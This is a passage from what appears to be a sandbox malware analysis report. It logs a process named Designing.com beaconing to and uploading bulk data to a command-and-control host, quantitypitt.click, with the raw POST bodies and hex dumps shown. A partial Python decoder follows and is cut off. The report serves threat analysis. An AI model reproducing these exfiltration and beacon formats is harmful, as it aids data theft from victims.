Server: cloudflare
CF-RAY: 8f638c219c4d8c7b-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1788&min_rtt=1780&rtt_var=683&sent=11&recv=20&lost=0&retrans=0&sent_bytes=2847&recv_bytes=15990&delivery_rate=1582655&cwnd=186&unsent_bytes=0&cid=b0000328b89a261f&ts=875&x=0"
2024-12-22 22:28:52 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-22 22:28:52 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
4          | 192.168.2.5 | 49788       | 172.67.186.189 | 443              | 6380 | C:\Users\user\AppData\Local\Temp\124531\Designing.com

Timestamp | Bytes transferred | Direction | Data
2024-12-22 22:28:54 UTC | 279 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=5KF09NDH3SOHE
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 20536
Host: quantitypitt.click
2024-12-22 22:28:54 UTC | 15331 | OUT | Data (multipart body, decoded from the captured bytes):
--5KF09NDH3SOHE
Content-Disposition: form-data; name="hwid"

E365D5522C4AB610165F70E3262EAA47
--5KF09NDH3SOHE
Content-Disposition: form-data; name="pid"

3
--5KF09NDH3SOHE
Content-Disposition: form-data; name="lid"

hRjzG3--VIKA
--5KF09NDH3SOH
2024-12-22 22:28:54 UTC | 5205 | OUT | Data Ascii (binary payload, non-printable bytes dropped): un 4F([:7s~X`nO`i
2024-12-22 22:28:55 UTC | 1142 | IN | HTTP/1.1 200 OK
Date: Sun, 22 Dec 2024 22:28:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=1ddqt3q44kgc8t8502dvemc17c; expires=Thu, 17 Apr 2025 16:15:33 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CH32J%2BfsuUc%2FLTQ8%2FOExqO1h68kP6F%2F8R1tktRJ5ZjPiG9ie%2FQB5y8U9UiEuHLZrn1dsXLJ5f%2BQuAyHsbtx7qGnEzDGgXiQsEtwEFU9C6%2FKfmYiCBFhkjPIBwKxQTwIYq%2FN3T6Y%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f638c2fbe9bc431-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2437&min_rtt=1704&rtt_var=1162&sent=15&recv=27&lost=0&retrans=0&sent_bytes=2846&recv_bytes=21495&delivery_rate=1713615&cwnd=229&unsent_bytes=0&cid=fd5ec087149c5944&ts=949&x=0"
2024-12-22 22:28:55 UTC | 20 | IN | Data (chunked body, decoded):
f
ok 8.46.123.189
2024-12-22 22:28:55 UTC | 5 | IN | Data (chunked body, decoded):
0


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
5          | 192.168.2.5 | 49794       | 172.67.186.189 | 443              | 6380 | C:\Users\user\AppData\Local\Temp\124531\Designing.com

Timestamp | Bytes transferred | Direction | Data
2024-12-22 22:28:56 UTC | 282 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=I8UMLDHAE16NIWXO8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 3805
Host: quantitypitt.click
2024-12-22 22:28:56 UTC | 3805 | OUT | Data (multipart body, decoded from the captured bytes):
--I8UMLDHAE16NIWXO8
Content-Disposition: form-data; name="hwid"

E365D5522C4AB610165F70E3262EAA47
--I8UMLDHAE16NIWXO8
Content-Disposition: form-data; name="pid"

1
--I8UMLDHAE16NIWXO8
Content-Disposition: form-data; name="lid"

hRjzG3--VIKA
--
2024-12-22 22:28:57 UTC | 1130 | IN | HTTP/1.1 200 OK
Date: Sun, 22 Dec 2024 22:28:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=p92i531ec9jb8ovua9k45vd3dp; expires=Thu, 17 Apr 2025 16:15:36 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2EW5hxqdtWZ3dnTP%2FFmtl2yGnJo0WYSBvrCSCCf3LhdUF12%2BD9L1al27Ngw9RGoQYLL98ndk69bMIIQ3SSKPJSxEIs2DP4LSy1vKYemJkBYOpUKNuGhIR5G3bnvsfrt7GQM4M%2BI%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f638c3f2ce88c83-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1836&min_rtt=1836&rtt_var=689&sent=6&recv=10&lost=0&retrans=0&sent_bytes=2845&recv_bytes=4723&delivery_rate=1588683&cwnd=189&unsent_bytes=0&cid=604aa912ad475257&ts=1043&x=0"
2024-12-22 22:28:57 UTC | 20 | IN | Data (chunked body, decoded):
f
ok 8.46.123.189
2024-12-22 22:28:57 UTC | 5 | IN | Data (chunked body, decoded):
0


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
6          | 192.168.2.5 | 49799       | 172.67.186.189 | 443              | 6380 | C:\Users\user\AppData\Local\Temp\124531\Designing.com

Timestamp | Bytes transferred | Direction | Data
2024-12-22 22:28:58 UTC | 284 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=FRIS9LZKT7T94LOZIN4
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 1253
Host: quantitypitt.click
2024-12-22 22:28:58 UTC | 1253 | OUT | Data (multipart body, decoded from the captured bytes):
--FRIS9LZKT7T94LOZIN4
Content-Disposition: form-data; name="hwid"

E365D5522C4AB610165F70E3262EAA47
--FRIS9LZKT7T94LOZIN4
Content-Disposition: form-data; name="pid"

1
--FRIS9LZKT7T94LOZIN4
Content-Disposition: form-data; name="lid"

hRjzG3--VI
2024-12-22 22:28:59 UTC | 1128 | IN | HTTP/1.1 200 OK
Date: Sun, 22 Dec 2024 22:28:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=mjf9efrqpsu3s9otor6p4o5f5a; expires=Thu, 17 Apr 2025 16:15:38 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B2eij3dD71HTqDPL1PVaGiYhK0oR9B8NcrAUetnt4p2%2FUDrsdfaGRge1NWDjJPKvi48ofWFwcDAhGtv5mH6a37jDwu7cf05%2BeTG%2F7HHB4duRU7aMBoRiC18g1kEAG1C0q7vPpig%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f638c4d9f3941db-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2093&min_rtt=2092&rtt_var=787&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2846&recv_bytes=2173&delivery_rate=1387173&cwnd=235&unsent_bytes=0&cid=9cdb20a53ccce9bc&ts=805&x=0"
2024-12-22 22:28:59 UTC | 20 | IN | Data (chunked body, decoded):
f
ok 8.46.123.189
2024-12-22 22:28:59 UTC | 5 | IN | Data (chunked body, decoded):
0


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
7          | 192.168.2.5 | 49805       | 172.67.186.189 | 443              | 6380 | C:\Users\user\AppData\Local\Temp\124531\Designing.com

Timestamp | Bytes transferred | Direction | Data
2024-12-22 22:29:01 UTC | 280 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=FGTA4F6GQKZXW
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 557508
Host: quantitypitt.click
2024-12-22 22:29:01 UTC | 15331 | OUT | Data (multipart body, decoded from the captured bytes):
--FGTA4F6GQKZXW
Content-Disposition: form-data; name="hwid"

E365D5522C4AB610165F70E3262EAA47
--FGTA4F6GQKZXW
Content-Disposition: form-data; name="pid"

1
--FGTA4F6GQKZXW
Content-Disposition: form-data; name="lid"

hRjzG3--VIKA
--FGTA4F6GQKZX
2024-12-22 22:29:01 UTC | 15331 | OUT | Data Ascii (binary payload, non-printable bytes dropped): [y&lM0F':R#=cHCQd/GJ_hw-FMKq(n%x4KdBahBDat)U2n-ET8A6mxTKHJng(GB`YL-:GSK:&Wz<^PT'#JR'xHLS@N4<E!|(P_z2r['i
                                                                                                                                                                            2024-12-22 22:29:01 UTC15331OUTData Raw: 99 d7 9b b8 cf cf e7 e7 87 d7 37 b4 d8 f7 b8 da f5 06 04 57 ed 45 19 c3 fa 66 c6 c3 7c 88 6f 5e 7a fe ca 8c d5 40 28 3f 31 28 d0 8a e6 90 ad da ad c5 e7 29 49 1e fa 95 da 0c c9 33 e4 ff 3c 22 8e aa 56 68 48 3c 30 10 a8 8b 57 97 94 bb 60 9d 29 54 1d 1e 7e 70 9c d6 b8 6e 9a 90 39 df c5 66 1a 56 a8 7d 33 b4 9e 79 91 26 32 2e cb 7d bd 8d 78 cb 48 17 77 d0 36 a1 f5 d2 83 d7 ca 5e a4 5e c2 a1 91 7a eb 9a 93 d5 a7 11 d9 bf 61 d1 55 f1 57 53 d9 2d ff 8d 01 57 7a 8a 43 c0 6c c1 a4 66 97 dd 23 de b7 4a 8e eb 5d b6 81 27 4a f0 1c f0 1b f8 be f5 17 ef e7 bf 59 6d f3 5c 66 f5 b2 ed d0 c6 85 bb 9d 17 5d 5e 3b f2 9a 44 7e b8 05 bb 07 6c 54 da af 5f d2 75 e7 ce 07 2d a9 b7 ff fc 53 05 4d 57 05 69 a1 8c 42 e1 0a 43 88 3a f1 e8 b3 fe 73 43 ee da 4e 19 ce 12 60 a1 f0 73 83
                                                                                                                                                                            Data Ascii: 7WEf|o^z@(?1()I3<"VhH<0W`)T~pn9fV}3y&2.}xHw6^^zaUWS-WzClf#J]'JYm\f]^;D~lT_u-SMWiBC:sCN`s
                                                                                                                                                                            2024-12-22 22:29:01 UTC15331OUTData Raw: 39 11 e5 f8 a8 a3 c2 ef f0 56 70 4e 32 0f 60 4a 5d 62 09 04 5d 36 18 bc 80 7a 10 b6 98 8b e1 4a 01 a6 ff 4c 65 45 0a fb ad 10 0a c5 2d f1 ca f6 ef 24 3a c0 e1 81 7e 2a 9f f7 0a a4 be a6 10 ba 17 8d e4 ec d4 8a c3 6e 10 a3 ce 9c 17 1d a1 bd fb d7 c4 ec bd 5b 5f 3d 8a 00 c8 8a 5e 5d 32 69 ca 11 93 4a dd 68 46 f7 a5 59 a4 3a 11 47 91 05 ff a7 47 c8 7f bb fb 53 ff 5e d9 a5 ff 0b 42 c0 d1 34 48 6b 22 c4 bc 96 00 b2 3d 3d 39 9e 7e a0 de 75 c7 c1 57 21 81 cd 7e 68 f2 03 d8 55 2c 5a 1a de ec 14 58 bc 0b c8 9e 56 60 74 fe b3 5f 7f 64 2b 66 3d 0c ac 49 72 85 95 16 ed 00 fc 65 f0 dd 70 a5 f7 fa c3 aa ca df 73 97 f3 f4 bc db d1 e7 05 b0 25 56 6a 8c 64 43 a0 40 a0 79 9c 14 d4 ce d1 98 ca e8 89 cf 61 bc ea 70 d2 45 d3 d2 2c 90 54 f3 62 cb a6 70 7a b0 06 2e a8 26 7f 86
                                                                                                                                                                            Data Ascii: 9VpN2`J]b]6zJLeE-$:~*n[_=^]2iJhFY:GGS^B4Hk"==9~uW!~hU,ZXV`t_d+f=Ireps%VjdC@yapE,Tbpz.&
                                                                                                                                                                            2024-12-22 22:29:01 UTC15331OUTData Raw: 19 8c 75 de 8b 5d db 47 2a 6b b2 20 23 ac 1c 0c 09 b0 71 83 a6 ad 41 4f 1e 51 7a db 74 c6 04 f6 9f 98 b3 2a a6 8e 62 ce e5 45 ed 4a 0a a1 e1 cf 51 5c 05 2d 7b 85 aa bc af a5 4a c3 da dd 6f 9b 48 0a 9c 2d bd f9 71 a4 1c 89 f5 f1 f3 db 0f 09 35 74 1a 73 af e1 20 68 63 2b a9 b8 c9 11 42 43 58 68 05 bf 0a d6 89 d9 7b 49 b4 c7 f6 db d8 c3 29 a8 4a fe 61 c2 8b fc e6 77 f5 73 d7 17 c2 63 af f5 1d 08 6a c3 e7 45 85 ef 00 ea a1 f4 24 61 57 e7 54 1f a1 73 00 79 e4 55 ca 83 c9 28 72 b4 17 f4 4e 21 01 10 06 20 bf fd bd 7f 1b 0f 44 ad 1e c5 49 0b 37 64 ec 6a ae 0b e3 e7 97 62 ff 12 17 53 c0 8a 1c a0 2f 07 b6 0a 55 6d c2 a5 9e 1f 5f 1b 96 33 e2 58 8f 6e 44 54 b8 28 84 f2 83 9f 1e 32 37 5a 4e 63 61 ef 3f 9e 47 ab 9c 52 14 5a ea 22 f9 81 c5 22 f0 cf 4d 6b b6 bc 6b f1 c3
                                                                                                                                                                            Data Ascii: u]G*k #qAOQzt*bEJQ\-{JoH-q5ts hc+BCXh{I)JawscjE$aWTsyU(rN! DI7djbS/Um_3XnDT(27ZNca?GRZ""Mkk
                                                                                                                                                                            2024-12-22 22:29:01 UTC15331OUTData Raw: 35 96 f9 b9 ad 1b 15 30 26 8c 58 b7 10 1a 08 49 c7 c0 14 2e 84 ad b6 61 bc ef 1b 1a 05 fa 97 c6 38 92 16 74 19 a0 af f5 67 df 31 c3 66 19 6d 5e c3 d2 0f 0c f8 b4 c1 fc f9 c6 75 61 c3 9f 2a f9 21 82 57 74 0a 9b d5 04 3b 4b e7 fb 23 63 0c cf 23 fb 79 5d d2 1b 0a 7c 3e 67 e5 b8 4b 87 a1 da fa 4d 13 54 a2 c0 fc fc 2d e1 e9 af 80 1e ff 69 be f4 06 3b 1d 50 4a 21 38 d3 fb 08 72 f3 08 af 30 87 6f 03 bd fa b9 16 0b c7 fa 6d 39 f1 da e7 4a ff 64 a3 03 45 60 b4 1a 29 54 c0 48 2b ae 3a e3 db bc 05 0b ae 6c f8 9f 96 86 94 24 10 22 93 f8 ed 9b 0b 08 3e f1 d3 22 df 89 e3 3b 29 d5 80 a0 78 75 e3 f9 80 2c fc 0b 0d ec a1 41 2c 20 cb 4a 7c 23 d1 c5 20 ba c5 39 81 34 1c d8 83 52 f8 7d 88 ee 45 20 ec f7 04 65 37 90 7c d1 a9 81 80 8f ff 81 77 ed bd f2 e5 bc 13 d6 15 c5 c7 cc
                                                                                                                                                                            Data Ascii: 50&XI.a8tg1fm^ua*!Wt;K#c#y]|>gKMT-i;PJ!8r0om9JdE`)TH+:l$">";)xu,A, J|# 94R}E e7|w
                                                                                                                                                                            2024-12-22 22:29:01 UTC15331OUTData Raw: 65 58 e6 59 d8 98 5e 42 9c c2 be 7d 7d ca 70 2d ea b5 ad dc c2 8e de 42 76 3a b3 43 a5 cb 00 d4 6e ac fe 51 04 51 2b a9 8a 3f 78 21 4d 2b cf 4a 42 d6 d7 02 ff 64 53 68 21 63 2d 7e 3c ee c6 8f 56 ea 6a f9 79 34 75 80 e7 cb b3 5d ae 08 cf 56 d2 23 d6 ec b9 10 b3 96 79 64 e9 df c3 47 96 d6 59 54 c3 57 bd fd 21 1f c3 db 81 53 2b b7 c6 9b a3 7f 75 f4 bf a9 ad ac 31 c0 b8 7b 24 64 a5 5f 0e 88 03 2f cf ff 5b 11 aa 6d c8 e7 75 5b d4 ff ec 49 59 8b b3 5f dd de f9 24 72 ab a6 3d 50 21 29 c3 ca 74 ef 92 13 d3 e1 4b 48 1d 13 7c 6a 83 12 ea 68 32 d6 59 40 e0 72 6f 54 e9 2e 52 cb 37 f4 cb ff 7f ad 60 70 f0 e6 aa d1 2b a0 2d 9e 2e 0e b2 a4 d1 4a fa e0 18 b6 b8 ad 54 43 e4 db 7d 38 e2 e8 bc 41 04 77 ab 03 0e 92 5c 3f 69 a4 2d 03 e0 c9 f5 5f ea f5 de 42 14 ad e8 d2 6f 33
                                                                                                                                                                            Data Ascii: eXY^B}}p-Bv:CnQQ+?x!M+JBdSh!c-~<Vjy4u]V#ydGYTW!S+u1{$d_/[mu[IY_$r=P!)tKH|jh2Y@roT.R7`p+-.JTC}8Aw\?i-_Bo3
                                                                                                                                                                            2024-12-22 22:29:01 UTC15331OUTData Raw: 1c 89 39 40 3e 8c a7 f9 0a ef 3d 80 8b 4b b4 07 09 2d f7 69 69 e2 f5 b3 2f 7f 73 5c 36 6a 4d 56 7e d7 9e 94 70 0e 82 8e 91 3e ec ee aa fb 91 d8 85 55 62 d2 9e 2c 2a 36 3b c8 37 fe f1 3f d9 28 f0 9a d5 b5 b7 d8 39 93 e3 e3 7f 96 a6 de 79 54 9a 38 a6 fe b4 6a 8c bc 56 b5 25 be 20 36 e6 55 01 03 16 a5 f1 6c bb 78 c5 74 52 5f 7a bf f9 93 0f 0a 63 fe 79 1a e2 16 ef 7e b5 4e 8e 87 53 e3 07 29 df 2d cf 3d 29 0f 92 15 3f 56 97 11 44 38 e5 e0 55 f5 8b e4 a1 b1 33 b3 10 1b 10 ff fe 27 e4 f3 24 cc 41 dc 1c 8c 02 9e d2 f4 ba 06 27 e7 8c 6a 4b 71 30 bd 8d d7 b2 27 3e 4c b0 3f 36 98 b8 28 f7 1b 9a 3b 1a 52 9e 07 04 23 0a 6b 39 f6 df 08 a7 55 8d b0 72 6f 6e b9 14 d4 06 21 89 26 36 7a ac bf 50 7f 65 a2 cb 22 68 0a f1 cb d3 76 c7 07 09 53 bf e0 23 a5 7b da 47 9f be 2f 61
                                                                                                                                                                            Data Ascii: 9@>=K-ii/s\6jMV~p>Ub,*6;7?(9yT8jV% 6UlxtR_zcy~NS)-=)?VD8U3'$A'jKq0'>L?6(;R#k9Uron!&6zPe"hvS#{G/a
                                                                                                                                                                            2024-12-22 22:29:01 UTC15331OUTData Raw: 38 ef ae 80 b4 4c b2 16 ff a7 41 6a 8d 41 b8 d3 29 56 07 2a b7 a9 83 ec eb 8d 1b 6b 7f 3b cf d1 9a d3 4b 3c 68 69 22 ee 38 4c 18 3b f9 98 bc 36 64 59 7a 64 d3 1f c4 43 9a 74 3b bf 36 a5 89 28 bd 78 a0 da cc 7d 75 db 32 79 12 9a 07 33 04 21 a5 4b 96 ef 4f 42 f1 6b d6 b0 29 cf df 78 ba c9 55 b7 33 c7 54 df 25 21 35 e5 69 75 82 fc 4f cb fa 53 d2 17 49 d7 aa 3f 54 a9 ce b8 8e d8 2a 11 f8 75 fd a4 34 28 3b 8f 8a b2 88 b2 34 b3 76 d6 f4 54 b3 cc d0 c1 1d 1a dd 6f 19 cb d8 04 b2 03 b0 f2 4a b5 01 bb 5b 9e 5e 0b 16 05 c9 71 d2 51 16 b1 31 e1 b5 bb 23 5a d3 7b 23 a1 cc 95 e0 ff 79 3d 44 f6 bf 5f 2f 99 de ee 7f 20 0e b2 70 98 ff cf 01 9a 22 d3 6d b1 f0 bd d8 7c 85 d3 9d d7 ac 3f c7 6f 92 a9 9a a0 56 53 4b d0 b6 c7 76 c9 a9 46 db bf c7 2a 19 d1 bf 0f 71 a4 72 4f 8c
                                                                                                                                                                            Data Ascii: 8LAjA)V*k;K<hi"8L;6dYzdCt;6(x}u2y3!KOBk)xU3T%!5iuOSI?T*u4(;4vToJ[^qQ1#Z{#y=D_/ p"m|?oVSKvF*qrO
                                                                                                                                                                            2024-12-22 22:29:01 UTC15331OUTData Raw: 27 15 63 95 db 56 53 4a 5c 13 b6 bd bc c9 da 0c 69 11 97 08 33 04 d1 c6 c9 51 63 c4 74 26 3e 7b e4 f0 3c 40 34 02 3e 2e 8d 6c 88 94 a5 78 a6 a0 ed e2 32 7b 9f 46 93 aa cd 28 1a 6c 9a d3 07 43 c5 3e 0f 9c 84 59 aa 69 f8 09 47 c0 b4 ed 52 83 35 76 5e fe 63 06 2d 49 13 64 c0 85 ad c9 99 07 99 99 41 dc 7b ff 7a 3b 35 5a 44 3a 30 d2 b1 f1 4f 37 4a 7d 5e 1d 55 d8 88 69 78 52 e5 73 42 7e f2 fd 8a df 16 aa 79 2d 53 0c fa eb 4b b5 aa fc 52 f9 5e e1 37 5f aa b1 ff 11 06 de 1c b4 28 2d d1 a1 c0 e1 a7 e3 7d c9 ec f4 28 f3 2e 59 a9 cb dd d5 56 04 bd 26 63 30 4a c4 4c 14 1e 3a 95 67 e8 1e f7 be ee 2c ad a7 d0 f4 63 2d 1c 74 96 b6 55 7c d3 bf bc 1f 8b 59 3c 38 f8 57 85 9f 04 95 34 3c a4 4a b7 8d 89 5d a3 7c 36 5a af 77 30 6c c9 ac 7a 8f ca f4 81 4f e1 10 ea e2 fe 14 3f
                                                                                                                                                                            Data Ascii: 'cVSJ\i3Qct&>{<@4>.lx2{F(lC>YiGR5v^c-IdA{z;5ZD:0O7J}^UixRsB~y-SKR^7_(-}(.YV&c0JL:g,c-tU|Y<8W4<J]|6Zw0lzO?
2024-12-22 22:29:03 UTC | 1147 | IN | HTTP/1.1 200 OK
Date: Sun, 22 Dec 2024 22:29:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=e6cgr80crjtblar73ouo7d9oa7; expires=Thu, 17 Apr 2025 16:15:42 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jMp9GFD22TBBvk6%2FX2WZRNzM8CNGomy%2FxdeOY5376VVllYbn56cohPjxXjIY2gnYL5wtrofAo%2Bk%2B%2F2R1y6Qsfvgz247cfvpK%2BWmu%2BKSwBCAUr%2FpczVe9KMbZ52GG%2FNUBRBdDkN4%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f638c5d2e75de92-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1779&min_rtt=1723&rtt_var=686&sent=346&recv=586&lost=0&retrans=0&sent_bytes=2847&recv_bytes=560008&delivery_rate=1694718&cwnd=245&unsent_bytes=0&cid=c59986305f215176&ts=2284&x=0"

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 49816 | 172.67.186.189 | 443 | 6380 | C:\Users\user\AppData\Local\Temp\124531\Designing.com
Timestamp | Bytes transferred | Direction | Data
2024-12-22 22:29:05 UTC | 267 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 113
Host: quantitypitt.click
2024-12-22 22:29:05 UTC | 113 | OUT | Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 56 49 4b 41 26 6a 3d 36 33 37 62 35 35 32 37 39 30 32 31 61 61 62 33 33 32 37 38 31 38 38 63 66 61 36 33 38 33 39 37 26 68 77 69 64 3d 45 33 36 35 44 35 35 32 32 43 34 41 42 36 31 30 31 36 35 46 37 30 45 33 32 36 32 45 41 41 34 37
Data Ascii: act=get_message&ver=4.0&lid=hRjzG3--VIKA&j=637b55279021aab33278188cfa638397&hwid=E365D5522C4AB610165F70E3262EAA47
2024-12-22 22:29:05 UTC | 1126 | IN | HTTP/1.1 200 OK
Date: Sun, 22 Dec 2024 22:29:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=kmlk868ijg7vf8unruqn0bd4ei; expires=Thu, 17 Apr 2025 16:15:44 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DfrZqsLAWAUFNB4EaqgPE5IcW5taiMiIEUvTs1eaqYqsRAn9p8muPjOXC4yyPYU3PWSKLWkO1J7vUc0ChqAeJxCvh7dlb6RAnkuoKurq7Vpj0%2F7J9OgQQ0yorN46AIfsc3Pkf%2B4%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f638c74a8c00c8a-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1687&min_rtt=1676&rtt_var=651&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=1016&delivery_rate=1652518&cwnd=108&unsent_bytes=0&cid=5507feadf9e2dddd&ts=883&x=0"
                                                                                                                                                                            2024-12-22 22:29:05 UTC218INData Raw: 64 34 0d 0a 71 59 45 54 39 69 63 6d 58 6e 59 78 4a 74 69 71 70 57 6d 49 58 6b 6d 49 66 58 79 76 51 54 62 35 6c 79 53 31 75 64 4e 31 66 54 58 79 2b 6a 47 44 42 52 78 38 48 6b 56 53 71 4e 6d 66 4e 61 63 43 5a 75 59 59 44 63 5a 76 52 5a 48 34 56 4f 6d 57 6f 42 45 61 58 39 44 30 5a 36 6f 49 56 69 30 65 48 31 4b 67 33 6f 64 46 71 6a 67 39 71 6b 64 4f 67 32 4e 54 32 36 30 56 79 4a 57 6f 56 77 67 58 6b 36 4e 37 67 6c 4e 57 4c 55 78 74 43 59 53 46 7a 67 58 68 4c 6a 33 68 42 77 32 42 4d 6c 36 57 35 33 69 61 30 4c 30 42 49 6c 62 46 38 55 79 61 51 31 51 42 42 56 6c 48 39 74 37 64 48 61 70 79 61 2b 34 4a 58 70 56 7a 47 74 76 79 42 6f 2b 49 72 69 67 3d 0d 0a
                                                                                                                                                                            Data Ascii: d4qYET9icmXnYxJtiqpWmIXkmIfXyvQTb5lyS1udN1fTXy+jGDBRx8HkVSqNmfNacCZuYYDcZvRZH4VOmWoBEaX9D0Z6oIVi0eH1Kg3odFqjg9qkdOg2NT260VyJWoVwgXk6N7glNWLUxtCYSFzgXhLj3hBw2BMl6W53ia0L0BIlbF8UyaQ1QBBVlH9t7dHapya+4JXpVzGtvyBo+Irig=
2024-12-22 22:29:05 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
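The records above are one beacon exchange from the sandboxed process: a multipart/form-data POST whose first three parts carry hwid, pid and lid (followed by several hundred kilobytes of non-text parts, per the Content-Length of 557508 and the binary dumps that follow), then a 113-byte form-urlencoded POST /api with act=get_message and the same lid and hwid, answered with a chunked body holding a single base64 string. The Python below is an added example, not part of the Joe Sandbox report: it decodes the "Data Raw" hex exactly as printed, extracts the beacon fields, de-chunks and base64-decodes the reply, and checks that both requests identify the same host. Field names are taken from the capture; what the server does with them, and what the 158 decoded reply bytes contain, is not stated in the report and the example does not guess. The `beacon_kind` labels are an assumption derived from this one capture, not a general signature.

```python
"""Decode and correlate the C2 exchange captured in session 8 above.

Added example, not part of the Joe Sandbox report.  The hex and ASCII
constants are copied from the report's "Data Raw" / "Data Ascii" lines;
field semantics are only what the capture itself shows."""
import base64
import re
from urllib.parse import parse_qs

BOUNDARY = "FGTA4F6GQKZXW"   # from the Content-Type header of the multipart POST

# First OUT record of the upload, as printed.  The report truncates the dump,
# so this copy also ends in a cut-off boundary ("--FGTA4F6GQKZX").
MULTIPART_HEX = (
    "2d 2d 46 47 54 41 34 46 36 47 51 4b 5a 58 57 0d 0a "                          # --FGTA4F6GQKZXW CRLF
    "43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 "              # Content-Disposition:
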